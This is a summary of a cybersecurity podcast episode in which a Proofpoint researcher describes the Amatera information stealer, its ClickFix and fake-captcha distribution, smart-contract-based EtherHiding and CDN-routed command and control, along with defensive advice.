CyberWire Daily – Episode: "Click Here to Steal" [Research Saturday]
Release Date: July 12, 2025
Host: N2K Networks
Introduction
In this episode of CyberWire Daily's Research Saturday, host Dave Bittner engages in an in-depth discussion with Selina Larson, a threat researcher and lead for intelligence analysis and strategy at Proofpoint. The conversation centers around the evolving landscape of information stealer malware, with a particular focus on the emergence of Amatera Stealer, its rebranding from ACR Stealer, and the sophisticated techniques employed by cybercriminals to evade detection.
Amatera Stealer: Evolution and Rebranding
Timestamp: [02:26]
Selina Larson introduces Amatera Stealer, a malware that originated as a rebranded version of ACR Stealer. She emphasizes the significance of this transformation:
"The stealer landscape right now is so dynamic... this was an interesting sort of little deep dive that we were able to see about this pretty interesting information stealer."
— Selina Larson [02:26]
Key Points:
- Code Overlap: Amatera Stealer shares significant portions of its code with ACR Stealer, indicating a direct lineage.
- Malware as a Service (MaaS): Amatera is marketed as a MaaS platform, similar to Luma, which was a prominent player before its disruption.
- Enhanced Features: The malware boasts improved anti-analysis capabilities, sophisticated command and control (C2) operations, and a structured tier system for users.
Distribution Techniques: Clear Fake Campaigns and Click Fix
Timestamp: [06:08]
The discussion shifts to the distribution methods used by Amatera Stealer, highlighting the prevalence of clear fake campaigns and the click fix technique.
"Click fix is basically copying, pasting and running PowerShell. And this is something that we've seen from just tons of actors. It's completely overtaken the landscape."
— Selina Larson [07:11]
Clear Fake Campaigns:
- Web Injects: Malware is delivered through compromised legitimate websites.
- Fake Captchas: Users are prompted to complete verification steps that actually execute malicious PowerShell commands.
Click Fix Technique:
- Social Engineering: Users are tricked into copying and pasting commands into PowerShell, leading to malware execution.
- Ubiquity: This method is widespread across various threat actors and scenarios, making it a dominant vector in current cyber threats.
Advanced Evasion Techniques: Ether Hiding
Timestamp: [10:55]
Selina introduces Ether Hiding, an advanced technique used in conjunction with clear fake campaigns to enhance malware evasion.
"Ether hiding uses a Binance smart contract that has JavaScript stored within, which generates the captcha and the malicious command on the host."
— Selina Larson [11:02]
Mechanism:
- Smart Contracts: JavaScript is embedded within a Binance smart contract to dynamically generate malicious commands.
- Flexibility: Allows threat actors to update commands without altering the primary inject, enhancing persistence and adaptability.
Amatera Stealer’s Capabilities and Command & Control (C2) Infrastructure
Timestamp: [15:17]
The conversation delves into the operational aspects of Amatera Stealer, outlining its data exfiltration goals and C2 communications.
"Amatera Stealer is capable of running secondary payloads, downloading and executing executables or PowerShell commands."
— Selina Larson [15:17]
Data Targets:
- Credentials: Passwords, crypto wallets.
- Sensitive Information: Files on disks, browser cookies, web forms.
C2 Strategies:
- Stealth Communication: Utilizes NTSockets over traditional HTTP requests to bypass standard detection.
- CDN Utilization: Employs public CDN services like Cloudflare for C2, complicating the blocking process due to the shared nature of CDN IPs.
- No DNS Dependency: Eliminates DNS lookups, rendering DNS-based monitoring ineffective.
Market Impact and the Decline of Luma Stealer
Timestamp: [18:13]
The discussion assesses whether Amatera Stealer is poised to fill the void left by the disrupted Luma Stealer.
"The market is now a little bit more open for some of these people who are like, okay, do I not trust Luma Stealer anymore... What we're seeing with Amatera is it's under active development."
— Selina Larson [19:48]
Insights:
- Opportunity Post-Luma Disruption: The takedown of Luma creates a gap that Amatera Stealer is well-positioned to exploit.
- Active Development: Continuous updates and improvements make Amatera a robust alternative for cybercriminals.
- Market Dynamics: Disruptions in one service often lead to the rise of others, emphasizing the need for constant vigilance.
Defensive Recommendations for Security Teams
Timestamp: [22:37]
Selina offers strategic advice for defenders to safeguard against threats like Amatera Stealer.
"Incorporate click fix technique into your existing security training and restrict users from running unauthorized PowerShell."
— Selina Larson [22:44]
Key Strategies:
- Network Signatures:
- Implement and update network signatures to detect malicious C2 traffic and data exfiltration.
- User Education:
- Train users to recognize and avoid social engineering tactics like click fix.
- Restrict PowerShell Usage:
- Prevent unauthorized execution of PowerShell commands to mitigate self-execution of malware.
- Control Downloads:
- Limit downloads from untrusted or newly registered domains.
- Ensure software downloads are vetted and authorized by IT departments.
- Defense in Depth:
- Implement multiple layers of security to block malicious activities even if one layer is breached.
Conclusion
The episode underscores the dynamic and evolving nature of the information stealer ecosystem, with Amatera Stealer exemplifying the advanced tactics employed by cybercriminals to sustain and enhance their operations. Selina Larson’s insights provide a comprehensive overview of the current threats and actionable strategies for organizations to bolster their defenses against such sophisticated malware.
Notable Quotes:
- Selina Larson [02:26]: "The stealer landscape right now is so dynamic... this was an interesting sort of little deep dive."
- Selina Larson [07:11]: "Click fix is basically copying, pasting and running PowerShell. And this is something that we've seen from just tons of actors. It's completely overtaken the landscape."
- Selina Larson [11:02]: "Ether hiding uses a Binance smart contract that has JavaScript stored within, which generates the captcha and the malicious command on the host."
- Selina Larson [22:44]: "Incorporate click fix technique into your existing security training and restrict users from running unauthorized PowerShell."
Produced by: Liz Stokes
Mixed by: Elliot Keltzman and Trey Hester
Executive Producer: Jennifer Iban
Publisher: Peter Kilpe
Host: Dave Bittner
This summary provides a comprehensive overview of the "Click Here to Steal" episode, capturing the essential discussions and insights shared by Selina Larson on the evolving threats posed by Amatera Stealer and the strategies to combat them.
![Click here to steal. [Research Saturday] - CyberWire Daily cover](/_next/image?url=https%3A%2F%2Fmegaphone.imgix.net%2Fpodcasts%2Fc69d7840-1c7a-11f0-85e0-aba6a56b08cc%2Fimage%2F95b72a93c2ffaf8ff900d662a9bd3735.png%3Fixlib%3Drails-4.3.1%26max-w%3D3000%26max-h%3D3000%26fit%3Dcrop%26auto%3Dformat%2Ccompress&w=1200&q=75)